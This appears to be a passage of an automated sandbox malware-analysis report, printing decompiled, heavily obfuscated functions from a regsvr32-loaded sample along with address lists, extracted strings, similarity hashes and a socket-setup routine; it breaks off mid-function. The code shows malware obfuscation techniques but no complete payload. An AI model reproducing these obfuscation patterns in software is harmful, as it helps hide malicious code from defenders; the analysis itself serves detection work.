				_v692 = _v692 >> 0xd;
				_v692 = _v692 + 0xbde1;
				_v692 = _v692 ^ 0x00055202;
				_v632 = 0x18da0d;
				_t369 = 0x57;
				_v632 = _v632 * 0x5d;
				_v632 = _v632 + 0xffff6f25;
				_v632 = _v632 ^ 0x090e1c26;
				_v580 = 0xa5e89c;
				_v580 = _v580 / _t369;
				_v580 = _v580 ^ 0x000ce540;
				_v680 = 0x842c1c;
				_v680 = _v680 << 5;
				_v680 = _v680 ^ 0x259e7cb4;
				_v680 = _v680 + 0xffff46bd;
				_v680 = _v680 ^ 0x3515c03d;
				_v624 = 0x501187;
				_v624 = _v624 ^ 0x46ba0327;
				_v624 = _v624 ^ 0x46eeb458;
				_t364 = _v624;
				do {
					while(_t335 != 0x2d5e71a) {
						if(_t335 == 0x67615db) {
							_t335 = 0xf75ce9f;
							continue;
						} else {
							if(_t335 == 0x7a053ff) {
								E04BA1538(_v680, _v624, _t364);
							} else {
								if(_t335 == 0x7a51f41) {
									_push(_v640);
									_push(_v608);
									_push(_v584);
									_t319 = E04B9E1F8(0x4b81000, _v648, __eflags);
									_t320 =  *0x4ba6214; // 0x0
									_t323 =  *0x4ba6214; // 0x0
									E04BA2D0A(_v672, __eflags, _t323 + 0x23c, _v600, _v684, _v700, 0x4b81000,  &_v524, _t320 + 0x34, _t319);
									E04B9FECB(_t319, _v704, _v676, _v652, _v660);
									_t372 =  &(_t372[0xe]);
									_t335 = 0x2d5e71a;
									continue;
								} else {
									if(_t335 == 0xa48fbff) {
										_v572 = _v572 - E04B85477(_t335);
										_t335 = 0x7a51f41;
										asm("sbb [esp+0x9c], edx");
										continue;
									} else {
										if(_t335 == 0xd7f7f02) {
											_t328 = _v568;
											_t342 = _v572;
											_v560 = _t328;
											_v552 = _t328;
											_v544 = _t328;
											_v536 = _t328;
											_v532 = _v620;
											_v564 = _t342;
											_v556 = _t342;
											_v548 = _t342;
											_v540 = _t342;
											_t331 = E04BA44FF(_v656, _v692, _t342, _v632, _t342, _v580,  &_v564, _t364);
											_t372 =  &(_t372[6]);
											__eflags = _t331;
											_t334 =  !=  ? 1 : _t334;
											_t335 = 0x7a053ff;
											continue;
										} else {
											if(_t335 != 0xf75ce9f) {
												goto L16;
											} else {
												E04B9CA1F(_v668, _v664,  &_v572, _v644, _v588);
												_t372 =  &(_t372[3]);
												_t335 = 0xa48fbff;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t334;
					}
					_t316 = E04BA45CA( &_v524, _v596, _t335, _t335, _v604, _v628, _v612, _v616, _v592, _v636, 0, _v688, _v696, _v576);
					_t364 = _t316;
					_t372 =  &(_t372[0xc]);
					__eflags = _t316 - 0xffffffff;
					if(__eflags == 0) {
						_t335 = 0xc46350e;
						goto L16;
					} else {
						_t335 = 0xd7f7f02;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t335 - 0xc46350e;
				} while (__eflags != 0);
				goto L19;
			}

0x04b9e955
0x04b9e95f
0x04b9e96c
0x04b9e977
0x04b9e97c
0x04b9e987
0x04b9e98f
0x04b9e997
0x04b9e99f
0x04b9e9a7
0x04b9e9af
0x04b9e9b7
0x04b9e9bf
0x04b9e9c7
0x04b9e9cf
0x04b9e9d4
0x04b9e9dc
0x04b9e9e4
0x04b9e9ec
0x04b9e9f4
0x04b9e9fc
0x04b9ea04
0x04b9ea0c
0x04b9ea11
0x04b9ea19
0x04b9ea21
0x04b9ea29
0x04b9ea2e
0x04b9ea36
0x04b9ea41
0x04b9ea49
0x04b9ea54
0x04b9ea5c
0x04b9ea64
0x04b9ea6c
0x04b9ea74
0x04b9ea87
0x04b9ea8e
0x04b9ea90
0x04b9ea9b
0x04b9eaa3
0x04b9eaab
0x04b9eab3
0x04b9eac2
0x04b9eac5
0x04b9ead1
0x04b9ead5
0x04b9eadd
0x04b9eae9
0x04b9eaec
0x04b9eaf0
0x04b9eaf8
0x04b9eafd
0x04b9eb05
0x04b9eb0d
0x04b9eb17
0x04b9eb1b
0x04b9eb23
0x04b9eb2b
0x04b9eb33
0x04b9eb3b
0x04b9eb43
0x04b9eb48
0x04b9eb4d
0x04b9eb52
0x04b9eb5a
0x04b9eb62
0x04b9eb67
0x04b9eb6e
0x04b9eb76
0x04b9eb7e
0x04b9eb86
0x04b9eb8b
0x04b9eb95
0x04b9eb9a
0x04b9eba0
0x04b9eba8
0x04b9ebb0
0x04b9ebb8
0x04b9ebc0
0x04b9ebc8
0x04b9ebd5
0x04b9ebd8
0x04b9ebdc
0x04b9ebe4
0x04b9ebec
0x04b9ebf4
0x04b9ebf9
0x04b9ebfd
0x04b9ec05
0x04b9ec10
0x04b9ec1b
0x04b9ec26
0x04b9ec2e
0x04b9ec33
0x04b9ec3b
0x04b9ec43
0x04b9ec50
0x04b9ec54
0x04b9ec5c
0x04b9ec64
0x04b9ec69
0x04b9ec71
0x04b9ec7c
0x04b9ec87
0x04b9ec92
0x04b9ec9a
0x04b9eca2
0x04b9ecaa
0x04b9ecb2
0x04b9ecba
0x04b9ecc2
0x04b9ecc7
0x04b9eccf
0x04b9ecd7
0x04b9ecdf
0x04b9ece7
0x04b9ecef
0x04b9ecf7
0x04b9ecff
0x04b9ed07
0x04b9ed0c
0x04b9ed14
0x04b9ed1c
0x04b9ed29
0x04b9ed2a
0x04b9ed2e
0x04b9ed36
0x04b9ed3e
0x04b9ed52
0x04b9ed59
0x04b9ed64
0x04b9ed6c
0x04b9ed71
0x04b9ed79
0x04b9ed86
0x04b9ed8e
0x04b9ed96
0x04b9ed9e
0x04b9eda6
0x04b9edaa
0x04b9edaa
0x04b9edbc
0x04b9ef46
0x00000000
0x04b9edc2
0x04b9edc8
0x04b9efca
0x04b9edce
0x04b9edd4
0x04b9eec6
0x04b9eecf
0x04b9eed3
0x04b9eede
0x04b9eee8
0x04b9ef0a
0x04b9ef1d
0x04b9ef34
0x04b9ef39
0x04b9ef3c
0x00000000
0x04b9edda
0x04b9ede0
0x04b9eeae
0x04b9eeb5
0x04b9eeba
0x00000000
0x04b9ede6
0x04b9ede8
0x04b9ee20
0x04b9ee27
0x04b9ee2e
0x04b9ee35
0x04b9ee3c
0x04b9ee43
0x04b9ee4f
0x04b9ee65
0x04b9ee75
0x04b9ee7c
0x04b9ee83
0x04b9ee8f
0x04b9ee96
0x04b9ee9a
0x04b9ee9c
0x04b9ee9f
0x00000000
0x04b9edea
0x04b9edf0
0x00000000
0x04b9edf6
0x04b9ee11
0x04b9ee16
0x04b9ee19
0x00000000
0x04b9ee19
0x04b9edf0
0x04b9ede8
0x04b9ede0
0x04b9edd4
0x04b9edc8
0x04b9efd3
0x04b9efdc
0x04b9efdc
0x04b9ef98
0x04b9ef9d
0x04b9ef9f
0x04b9efa2
0x04b9efa5
0x04b9efae
0x00000000
0x04b9efa7
0x04b9efa7
0x00000000
0x04b9efa7
0x00000000
0x04b9efb3
0x04b9efb3
0x04b9efb3
0x00000000

Strings

!, xrefs: 04B9EB2B
RaJ, xrefs: 04B9EC05
ie, xrefs: 04B9EA11
p, xrefs: 04B9EAFD
BqAT, xrefs: 04B9EB6E
:, xrefs: 04B9EC10
WTk, xrefs: 04B9E9BF
{l, xrefs: 04B9ECDF
yv, xrefs: 04B9EA21

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: :$BqAT$RaJ$WTk$ie$yv${l$!$p
API String ID: 0-4263964199
Opcode ID: 6d63410c6fdc40dba6e3673d227a432f882680c6bc916eadd0b50e17c26e2283
Instruction ID: f6168c85f8527b26cfff19f8f696d44b3a9645111b0cbf2e7a3a9770d1aa4062
Opcode Fuzzy Hash: 6d63410c6fdc40dba6e3673d227a432f882680c6bc916eadd0b50e17c26e2283
Instruction Fuzzy Hash: 64F13FB24097808FD3A8CF65C549A5BFBF1FBC4758F10891DE2AA86260D7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 100011C0, Relevance: 10.6, APIs: 7, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 100011F1
_memset.LIBCMT ref: 10001205
htonl.WS2_32(00000000), ref: 1000121B
htons.WS2_32(?), ref: 1000122F
socket.WS2_32(00000002,00000002,00000000), ref: 10001245
bind.WS2_32(?,?,00000010), ref: 1000126A
setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 100012AC

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
String ID:
API String ID: 1003240404-0
Opcode ID: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
Instruction ID: 88ed1bb05716eef25c8d7e89d15ea7d56457a166ccc4c5acc9453768105f33a4
Opcode Fuzzy Hash: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
Instruction Fuzzy Hash: 1C215974A01228AFE760DF60CC85BD9B7B4EF49714F1081D8E949AB381CB71A9C2DF51

Uniqueness

Uniqueness Score: -1.00%

Function 04BA36AA, Relevance: 10.4, Strings: 8, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E04BA36AA() {
				signed int _t373;
				signed int _t378;
				signed int _t379;
				signed int _t382;
				intOrPtr _t383;
				signed int _t385;
				signed int _t387;
				void* _t392;
				signed int _t435;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t449;
				signed int* _t453;

				 *_t453 = 0x507140;
				_t392 = 0xe12044f;
				_t453[4] =  *_t453 * 0x71;
				_t438 = 0x6b;
				_t453[5] = _t453[4] / _t438;
				_t453[5] = _t453[5] >> 9;
				_t453[5] = _t453[5] ^ 0x00002a7b;
				_t453[9] = 0x87b94d;
				_t453[9] = _t453[9] + 0xffff92a0;
				_t453[9] = _t453[9] + 0x79ac;
				_t453[9] = _t453[9] >> 3;
				_t453[9] = _t453[9] ^ 0x0010f8b2;
				_t453[0x18] = 0x43735f;
				_t453[0x18] = _t453[0x18] << 0xa;
				_t453[0x18] = _t453[0x18] + 0xffff408e;
				_t453[0x18] = _t453[0x18] ^ 0x0dccbc8d;
				_t453[0x19] = 0x2e99ff;
				_t439 = 0x48;
				_t453[0x19] = _t453[0x19] / _t439;
				_t453[0x19] = _t453[0x19] | 0xc1c83132;
				_t453[0x19] = _t453[0x19] ^ 0xc1c60879;
				_t453[0xc] = 0xdcf188;
				_t440 = 0x21;
				_t453[0x2b] = _t453[0x2b] & 0x00000000;
				_t453[0xc] = _t453[0xc] * 0x48;
				_t453[0xc] = _t453[0xc] + 0xb8d0;
				_t453[0xc] = _t453[0xc] + 0xe79e;
				_t453[0xc] = _t453[0xc] ^ 0x3e220605;
				_t453[0x1f] = 0x3f10b8;
				_t453[0x1f] = _t453[0x1f] | 0x536a71f8;
				_t453[0x1f] = _t453[0x1f] ^ 0x537d907f;
				_t453[0x17] = 0xda4ece;
				_t453[0x17] = _t453[0x17] / _t440;
				_t453[0x17] = _t453[0x17] + 0xffff6c3f;
				_t453[0x17] = _t453[0x17] ^ 0x000916d6;
				_t453[0x21] = 0x81e16;
				_t441 = 0x1f;
				_t453[0x20] = _t453[0x21] * 0x37;
				_t453[0x20] = _t453[0x20] ^ 0x01bbd9e8;
				_t453[0x12] = 0x23ff7a;
				_t453[0x12] = _t453[0x12] + 0xda88;
				_t453[0x12] = _t453[0x12] << 9;
				_t453[0x12] = _t453[0x12] ^ 0x49b967a0;
				_t453[0x25] = 0xa4ae1d;
				_t453[0x25] = _t453[0x25] + 0xffff1e93;
				_t453[0x25] = _t453[0x25] ^ 0x00a3b794;
				_t453[0x1a] = 0xc58380;
				_t453[0x1a] = _t453[0x1a] + 0xffff63f4;
				_t453[0x1a] = _t453[0x1a] ^ 0x00c360dd;
				_t453[0xa] = 0x315c71;
				_t453[0xa] = _t453[0xa] * 0x2d;
				_t453[0xa] = _t453[0xa] << 4;
				_t453[0xa] = _t453[0xa] >> 9;
				_t453[0xa] = _t453[0xa] ^ 0x004c0641;
				_t453[0x26] = 0xfaa693;
				_t453[0x26] = _t453[0x26] / _t441;
				_t453[0x26] = _t453[0x26] ^ 0x0006da62;
				_t453[6] = 0x2e22d8;
				_t453[6] = _t453[6] + 0x1da5;
				_t453[6] = _t453[6] ^ 0x7a3436a8;
				_t453[6] = _t453[6] + 0x3380;
				_t453[6] = _t453[6] ^ 0x7a1ea83a;
				_t453[0xe] = 0x225cf9;
				_t442 = 0x46;
				_t453[0xf] = _t453[0xe] * 0xd;
				_t453[0xf] = _t453[0xf] / _t442;
				_t453[0xf] = _t453[0xf] ^ 0x000c9e58;
				_t453[0x1e] = 0xb4cd70;
				_t443 = 5;
				_t453[0x1e] = _t453[0x1e] / _t443;
				_t453[0x1e] = _t453[0x1e] ^ 0x00223e8b;
				_t453[0x25] = 0x175145;
				_t453[0x25] = _t453[0x25] + 0xffffbe60;
				_t453[0x25] = _t453[0x25] ^ 0x0015ea4b;
				_t453[0x16] = 0x9a90a6;
				_t453[0x16] = _t453[0x16] >> 1;
				_t453[0x16] = _t453[0x16] | 0x97e6917e;
				_t453[0x16] = _t453[0x16] ^ 0x97edbee9;
				_t453[0x14] = 0x10553c;
				_t453[0x14] = _t453[0x14] | 0x69ed7b68;
				_t453[0x14] = _t453[0x14] ^ 0x8ccf5101;
				_t453[0x14] = _t453[0x14] ^ 0xe532736d;
				_t453[0x12] = 0x5e103c;
				_t453[0x12] = _t453[0x12] ^ 0xd5bdf2ed;
				_t453[0x12] = _t453[0x12] | 0x536bb37e;
				_t453[0x12] = _t453[0x12] ^ 0xd7e39e3a;
				_t453[6] = 0xad714c;
				_t453[6] = _t453[6] << 5;
				_t444 = 0x5a;
				_t453[6] = _t453[6] * 0x77;
				_t453[6] = _t453[6] | 0x8fd7f967;
				_t453[6] = _t453[6] ^ 0x9ffa7b5b;
				_t453[0x29] = 0x969a62;
				_t453[0x29] = _t453[0x29] + 0xffff3747;
				_t453[0x29] = _t453[0x29] ^ 0x009bad24;
				_t453[0x22] = 0xa29aa2;
				_t453[0x22] = _t453[0x22] + 0xffff9bca;
				_t453[0x22] = _t453[0x22] ^ 0x00a8d7f4;
				_t453[0x28] = 0x5c718d;
				_t453[0x28] = _t453[0x28] / _t444;
				_t453[0x28] = _t453[0x28] ^ 0x000e04a7;
				_t453[0x15] = 0x6aed70;
				_t453[0x15] = _t453[0x15] | 0x24270adc;
				_t453[0x15] = _t453[0x15] ^ 0x00a30154;
				_t453[0x15] = _t453[0x15] ^ 0x24c5236d;
				_t453[0x20] = 0x9ad963;
				_t453[0x20] = _t453[0x20] ^ 0x804e7f4a;
				_t453[0x20] = _t453[0x20] ^ 0x80d9ea50;
				_t453[0x1c] = 0xc68496;
				_t453[0x1c] = _t453[0x1c] >> 0x10;
				_t453[0x1c] = _t453[0x1c] ^ 0x0003f168;
				_t453[0x24] = 0x7e4214;
				_t453[0x24] = _t453[0x24] << 4;
				_t453[0x24] = _t453[0x24] ^ 0x07e08805;
				_t453[0x11] = 0x92d404;
				_t445 = 0x3c;
				_t453[0x10] = _t453[0x11] / _t445;
				_t453[0x10] = _t453[0x10] + 0x2a76;
				_t453[0x10] = _t453[0x10] ^ 0x0004ebe7;
				_t453[9] = 0xe8ea05;
				_t453[9] = _t453[9] + 0xffffd5a4;
				_t453[9] = _t453[9] << 7;
				_t453[9] = _t453[9] + 0xffff1c2a;
				_t453[9] = _t453[9] ^ 0x7454948f;
				_t453[7] = 0x853308;
				_t453[7] = _t453[7] + 0xffff5128;
				_t453[7] = _t453[7] + 0x9f37;
				_t453[7] = _t453[7] | 0x54c51839;
				_t453[7] = _t453[7] ^ 0x54ca1cec;
				_t453[0x1c] = 0x270edd;
				_t453[0x1c] = _t453[0x1c] + 0x9c5c;
				_t453[0x1c] = _t453[0x1c] ^ 0x00251ad9;
				_t453[0x22] = 0x4b1e01;
				_t453[0x22] = _t453[0x22] >> 0xa;
				_t453[0x22] = _t453[0x22] ^ 0x00014be5;
				_t453[0xf] = 0x1097d4;
				_t453[0xf] = _t453[0xf] ^ 0x70356bb9;
				_t453[0xf] = _t453[0xf] << 7;
				_t453[0xf] = _t453[0xf] ^ 0x12f26116;
				_t453[0xd] = 0x3e61;
				_t453[0xd] = _t453[0xd] ^ 0x4940d563;
				_t453[0xd] = _t453[0xd] << 5;
				_t453[0xd] = _t453[0xd] ^ 0x28127601;
				_t453[0x19] = 0xea3040;
				_t265 =  &(_t453[0x19]); // 0xea3040
				_t446 = 0x24;
				_t390 = _t453[0x2a];
				_t453[0x1a] =  *_t265 * 0x3e;
				_t435 = _t453[0x2a];
				_t453[0x1a] = _t453[0x1a] / _t446;
				_t453[0x1a] = _t453[0x1a] ^ 0x01901c81;
				_t453[0xd] = 0xdd1c82;
				_t447 = 0x39;
				_t451 = _t453[0x29];
				_t453[0xc] = _t453[0xd] * 0x64;
				_t453[0xc] = _t453[0xc] / _t447;
				_t453[0xc] = _t453[0xc] ^ 0x01838ff7;
				L1:
				while(1) {
					while(_t392 != 0x17dddcb) {
						if(_t392 == 0x8a29766) {
							E04BA2B09(_t453[0x24], _t435, _t453[0x10], _t453[0xd]);
							_t392 = 0xcdeb26f;
							continue;
						} else {
							if(_t392 == 0xac116a6) {
								E04BA0DB1(_t453[0x1b],  &(_t453[0x2d]), __eflags, _t453[0xd], _t392, _t453[0x1e]);
								_t373 = E04B909DD(_t453[0x1b],  &(_t453[0x30]), _t453[0x24], _t453[0x15]);
								_t451 = _t373;
								_t453 =  &(_t453[5]);
								_t392 = 0xf1147e4;
								 *((short*)(_t373 - 2)) = 0;
								continue;
							} else {
								if(_t392 == 0xcdeb26f) {
									_t337 =  &(_t453[0x19]); // 0xea3040
									E04BA1538( *_t337, _t453[0xc], _t390);
								} else {
									if(_t392 == 0xe12044f) {
										_t392 = 0xac116a6;
										continue;
									} else {
										if(_t392 == 0xe899f05) {
											_t378 = E04B9E406(_t453[0x11], _t453[0x33], _t392, _t453[0x2b], _t453[0x30], _t435, _t453[0xb], _t392,  &(_t453[0x2e]), _t453[0x2d], _t453[0x17], _t453[0x21], _t392, _t390);
											_t453 =  &(_t453[0xc]);
											__eflags = _t378;
											if(_t378 == 0) {
												L17:
												_t379 = _t453[0x2a];
											} else {
												_t449 = _t435;
												while(1) {
													__eflags =  *((intOrPtr*)(_t449 + 4)) - 4;
													if( *((intOrPtr*)(_t449 + 4)) != 4) {
														goto L14;
													}
													L13:
													_t387 = E04BA061D(_t453[0x1d], _t451, _t449 + 0xc, _t453[0x24], _t453[0x10]);
													_t453 =  &(_t453[3]);
													__eflags = _t387;
													if(_t387 == 0) {
														_t379 = 1;
														_t453[0x2a] = 1;
													} else {
														goto L14;
													}
													goto L18;
													L14:
													_t385 =  *_t449;
													__eflags = _t385;
													if(_t385 == 0) {
														goto L17;
													} else {
														_t449 = _t449 + _t385;
														__eflags =  *((intOrPtr*)(_t449 + 4)) - 4;
														if( *((intOrPtr*)(_t449 + 4)) != 4) {
															goto L14;
														}
													}
													goto L18;
												}
											}
											L18:
											__eflags = _t379;
											if(__eflags == 0) {
												L20:
												_t392 = 0xe899f05;
											} else {
												_t383 =  *0x4ba6208; // 0x0
												E04BA27BC(_t453[0xa], _t453[8],  *((intOrPtr*)(_t383 + 0x18)), _t453[0x1c]);
												_t392 = 0x8a29766;
											}
											continue;
											L30:
										} else {
											if(_t392 != 0xf1147e4) {
												L26:
												__eflags = _t392 - 0x2906cf2;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												_t382 = E04BA45CA( &(_t453[0x38]), _t453[0x2f], _t392, _t392, _t453[0x23], _t453[0x12], _t453[0x2d], 1, _t453[0xb], _t453[0x12], 0x2000000, _t453[0x1f], _t453[0x18], _t453[8] | 0x00000006);
												_t390 = _t382;
												_t453 =  &(_t453[0xc]);
												if(_t382 != 0xffffffff) {
													_t392 = 0x17dddcb;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L29:
						__eflags = 0;
						return 0;
						goto L30;
					}
					_push(_t392);
					_push(_t392);
					_t453[0x2c] = 0x1000;
					_t435 = E04B8C5D8(0x1000);
					_t453 =  &(_t453[3]);
					__eflags = _t435;
					if(__eflags != 0) {
						goto L20;
					} else {
						_t392 = 0xcdeb26f;
						goto L26;
					}
					goto L29;
				}
			}

0x04ba36b0
0x04ba36bd
0x04ba36c6
0x04ba36d0
0x04ba36d5
0x04ba36db
0x04ba36e0
0x04ba36e8
0x04ba36f0
0x04ba36f8
0x04ba3700
0x04ba3705
0x04ba370d
0x04ba3715
0x04ba371a
0x04ba3722
0x04ba372a
0x04ba3736
0x04ba373b
0x04ba3741
0x04ba3749
0x04ba3751
0x04ba375e
0x04ba3761
0x04ba3769
0x04ba376d
0x04ba3775
0x04ba377d
0x04ba3785
0x04ba378d
0x04ba3795
0x04ba379d
0x04ba37ad
0x04ba37b1
0x04ba37b9
0x04ba37c1
0x04ba37d4
0x04ba37d5
0x04ba37dc
0x04ba37e7
0x04ba37ef
0x04ba37f7
0x04ba37fc
0x04ba3804
0x04ba380f
0x04ba381a
0x04ba3825
0x04ba382d
0x04ba3835
0x04ba383d
0x04ba384a
0x04ba384e
0x04ba3853
0x04ba3858
0x04ba3860
0x04ba3874
0x04ba387b
0x04ba3886
0x04ba3890
0x04ba3898
0x04ba38a0
0x04ba38a8
0x04ba38b0
0x04ba38bf
0x04ba38c2
0x04ba38ce
0x04ba38d2
0x04ba38da
0x04ba38e6
0x04ba38eb
0x04ba38f1
0x04ba38f9
0x04ba3904
0x04ba390f
0x04ba391a
0x04ba3922
0x04ba3926
0x04ba392e
0x04ba3936
0x04ba393e
0x04ba3946
0x04ba394e
0x04ba3956
0x04ba395e
0x04ba3966
0x04ba396e
0x04ba3976
0x04ba397e
0x04ba3988
0x04ba398b
0x04ba398f
0x04ba3997
0x04ba399f
0x04ba39aa
0x04ba39b5
0x04ba39c0
0x04ba39cb
0x04ba39d6
0x04ba39e1
0x04ba39f7
0x04ba39fe
0x04ba3a09
0x04ba3a11
0x04ba3a19
0x04ba3a21
0x04ba3a29
0x04ba3a34
0x04ba3a3f
0x04ba3a4a
0x04ba3a52
0x04ba3a57
0x04ba3a5f
0x04ba3a6a
0x04ba3a72
0x04ba3a7d
0x04ba3a89
0x04ba3a8c
0x04ba3a90
0x04ba3a98
0x04ba3aa0
0x04ba3aa8
0x04ba3ab2
0x04ba3ab7
0x04ba3abf
0x04ba3ac7
0x04ba3acf
0x04ba3ad7
0x04ba3adf
0x04ba3ae7
0x04ba3aef
0x04ba3af7
0x04ba3aff
0x04ba3b07
0x04ba3b12
0x04ba3b1a
0x04ba3b25
0x04ba3b2d
0x04ba3b35
0x04ba3b3a
0x04ba3b42
0x04ba3b4a
0x04ba3b52
0x04ba3b57
0x04ba3b5f
0x04ba3b67
0x04ba3b6e
0x04ba3b71
0x04ba3b78
0x04ba3b84
0x04ba3b8b
0x04ba3b8f
0x04ba3b97
0x04ba3ba4
0x04ba3ba5
0x04ba3bac
0x04ba3bb6
0x04ba3bba
0x00000000
0x04ba3bc2
0x04ba3bc2
0x04ba3bd4
0x04ba3d95
0x04ba3d9c
0x00000000
0x04ba3bda
0x04ba3be0
0x04ba3d4f
0x04ba3d6a
0x04ba3d6f
0x04ba3d71
0x04ba3d76
0x04ba3d7b
0x00000000
0x04ba3be6
0x04ba3bec
0x04ba3df4
0x04ba3df9
0x04ba3bf2
0x04ba3bf8
0x04ba3d31
0x00000000
0x04ba3bfe
0x04ba3c04
0x04ba3cac
0x04ba3cb1
0x04ba3cb4
0x04ba3cb6
0x04ba3cf7
0x04ba3cf7
0x04ba3cb8
0x04ba3cb8
0x04ba3cba
0x04ba3cba
0x04ba3cbe
0x00000000
0x00000000
0x04ba3cc0
0x04ba3cd5
0x04ba3cda
0x04ba3cdd
0x04ba3cdf
0x04ba3ced
0x04ba3cee
0x00000000
0x00000000
0x00000000
0x00000000
0x04ba3ce1
0x04ba3ce1
0x04ba3ce3
0x04ba3ce5
0x00000000
0x04ba3ce7
0x04ba3ce7
0x04ba3cba
0x04ba3cbe
0x00000000
0x00000000
0x04ba3cbe
0x00000000
0x04ba3ce5
0x04ba3cba
0x04ba3cfe
0x04ba3cfe
0x04ba3d00
0x04ba3d27
0x04ba3d27
0x04ba3d02
0x04ba3d06
0x04ba3d16
0x04ba3d1d
0x04ba3d1d
0x00000000
0x00000000
0x04ba3c06
0x04ba3c0c
0x04ba3de2
0x04ba3de2
0x04ba3de8
0x00000000
0x00000000
0x04ba3dee
0x04ba3c12
0x04ba3c53
0x04ba3c58
0x04ba3c5a
0x04ba3c60
0x04ba3c66
0x00000000
0x04ba3c66
0x04ba3c60
0x04ba3c0c
0x04ba3c04
0x04ba3bf8
0x04ba3bec
0x04ba3be0
0x04ba3dff
0x04ba3e02
0x04ba3e0b
0x00000000
0x04ba3e0b
0x04ba3db9
0x04ba3dba
0x04ba3dc0
0x04ba3dd0
0x04ba3dd2
0x04ba3dd5
0x04ba3dd7
0x00000000
0x04ba3ddd
0x04ba3ddd
0x00000000
0x04ba3ddd
0x00000000
0x04ba3dd7

Strings

ms2, xrefs: 04BA394E
a>, xrefs: 04BA3B42
q\1, xrefs: 04BA383D
_sC, xrefs: 04BA370D
{*, xrefs: 04BA36E0
v*, xrefs: 04BA3A90
pj, xrefs: 04BA3A09
@0, xrefs: 04BA3B67

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: @0$_sC$a>$ms2$pj$q\1$v*${*
API String ID: 0-3081288078
Opcode ID: 6b6ab278fd79d34574ce48fc47ff34549399efc2f0d137c2da01bbb97f184d8b
Instruction ID: d5ea5a9f129303bf02c241dedee17ec5e298647b12c230d229a021600b6f9484
Opcode Fuzzy Hash: 6b6ab278fd79d34574ce48fc47ff34549399efc2f0d137c2da01bbb97f184d8b
Instruction Fuzzy Hash: 4402407150C380DFD3A8CF65C88AA4BBBE1FBC4758F10891DE6DA86260D7B59958CB43

Uniqueness

Uniqueness Score: -1.00%

Function 04BA46BD, Relevance: 10.3, Strings: 8, Instructions: 293
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04BA46BD(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t316;
				intOrPtr _t339;
				intOrPtr* _t341;
				void* _t343;
				intOrPtr* _t346;
				void* _t348;
				intOrPtr* _t349;
				void* _t351;
				intOrPtr _t367;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t375;
				void* _t376;

				_t369 = _a16;
				_t349 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B9FE29(_t316);
				_v16 = 0xd9d351;
				_t367 = 0;
				_v12 = 0x17e122;
				_t376 = _t375 + 0x18;
				_v8 = 0;
				_v96 = 0xcc9d59;
				_t351 = 0xff449f4;
				_v96 = _v96 << 0xc;
				_v96 = _v96 + 0x162d;
				_v96 = _v96 ^ 0xc9d5a62c;
				_v132 = 0x3cc17f;
				_v132 = _v132 + 0xffff84d9;
				_t370 = 0x52;
				_v132 = _v132 * 0x3d;
				_v132 = _v132 << 0xf;
				_v132 = _v132 ^ 0x617c0001;
				_v48 = 0x63951b;
				_v48 = _v48 >> 7;
				_v48 = _v48 ^ 0x0000c72a;
				_v64 = 0xbc1395;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 ^ 0x000005e0;
				_v80 = 0x50b5ee;
				_v80 = _v80 + 0xf34;
				_v80 = _v80 >> 1;
				_v80 = _v80 ^ 0x00286291;
